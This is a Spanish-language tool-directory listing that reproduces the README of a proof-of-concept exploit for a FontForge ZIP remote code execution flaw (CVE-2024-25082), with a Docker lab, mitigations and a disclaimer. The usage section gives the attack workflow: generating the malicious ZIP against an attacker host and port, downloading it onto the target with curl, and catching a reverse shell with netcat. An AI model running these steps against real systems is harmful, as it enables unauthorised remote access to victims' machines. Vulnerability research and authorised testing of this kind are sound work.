Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-25082 — Exploit de prueba de concepto para CVE-2024-25082, que demuestra ejecución remota de código en FontForge mediante archivos ZIP manipulados. Incluye generador de payloads, laboratorio Docker y documentación técnica para investigación y educación en seguridad. | Kitploit
Herramientas/GitHubGitHub/moamenx8/cve-2024-25082
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubmoamenx8/cve-2024-25082

CVE-2024-25082

Exploit de prueba de concepto para CVE-2024-25082, que demuestra ejecución remota de código en FontForge mediante archivos ZIP manipulados. Incluye generador de payloads, laboratorio Docker y documentación técnica para investigación y educación en seguridad.

Ver Repositorio
hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

⚠️ CVE-2024-25082 - FontForge ZIP Ejecución Remota de Código (PoC)

License Python CVE

Exploit de Prueba de Concepto para CVE-2024-25082, una vulnerabilidad que afecta a FontForge y permite Ejecución Remota de Código (RCE) a través de un archivo ZIP manipulado.

Este repositorio demuestra cómo se puede explotar la vulnerabilidad en un entorno de laboratorio controlado con fines de investigación en seguridad y educativos.


Resumen de la Vulnerabilidad

  • CVE ID: CVE-2024-25082\
  • Software Afectado: FontForge\
  • Tipo de Vulnerabilidad: Ejecución Remota de Código\
  • Vector de Ataque: Archivo ZIP malicioso\
  • Impacto: Ejecución arbitraria de comandos al procesar el archivo manipulado.

La vulnerabilidad se produce debido a una validación incorrecta de los archivos dentro de archivos ZIP, lo que permite a un atacante ejecutar comandos arbitrarios en el sistema objetivo.


Estructura del Repositorio

root@kitploit:~
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│   └── exploit.zip
├── writeup.md
└── License

Archivo Descripción


exploit.py Genera la carga maliciosa ZIP poc/ Contiene los archivos de prueba de concepto generados writeup.md Explicación técnica de la vulnerabilidad


Requisitos

  • Python 3.x
  • Netcat

Instalar herramientas opcionales:

root@kitploit:~
sudo apt install netcat

Uso

1️⃣ Generar la carga maliciosa

root@kitploit:~
python3 exploit.py --lhost <Tu IP> --lport <Tu Puerto>

Esto generará un archivo exploit.zip malicioso.


2️⃣ Servir el exploit

root@kitploit:~
python3 -m http.server 8080

3️⃣ Subir desde el sistema objetivo

root@kitploit:~
curl http://<Tu IP>:8080/exploit.zip -o /ruta/al/directorio/de/subida/exploit.zip

4️⃣ Capturar la reverse shell

root@kitploit:~
nc -lvnp <Tu Puerto>

Si tiene éxito, se debería obtener una shell del sistema objetivo.


Reproducción de la Vulnerabilidad

Se proporciona un entorno vulnerable reproducible dentro del directorio docker/.

Ejemplo:

root@kitploit:~
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln

Esto permite realizar pruebas seguras sin afectar sistemas de producción.


Impacto de Seguridad

Un atacante que pueda cargar o controlar archivos ZIP procesados por la aplicación vulnerable podría:

  • Ejecutar comandos arbitrarios del sistema
  • Obtener acceso remoto a la shell
  • Comprometer el sistema anfitrión

Mitigación

Medidas de mitigación recomendadas:

  • Actualizar FontForge a una versión parcheada
  • Validar el contenido de los archivos cargados
  • Restringir la funcionalidad de carga de archivos
  • Usar sandboxing al procesar fuentes

Descargo de Responsabilidad

Este repositorio contiene código de Prueba de Concepto para una vulnerabilidad divulgada públicamente.

El código se proporciona estrictamente para:

  • Investigación en seguridad
  • Fines educativos
  • Pruebas de penetración autorizadas

NO utilice este código contra sistemas sin permiso explícito.

El autor no asume ninguna responsabilidad por el mal uso o daños causados por este software.


Autor

Moamen Elmaghrabi

Estudiante de Ciberseguridad
Pruebas de Penetración y Desarrollo de Exploits


Licencia

Este proyecto está licenciado bajo la Licencia MIT.
Consulte el archivo LICENSE para más detalles.

Descargar herramienta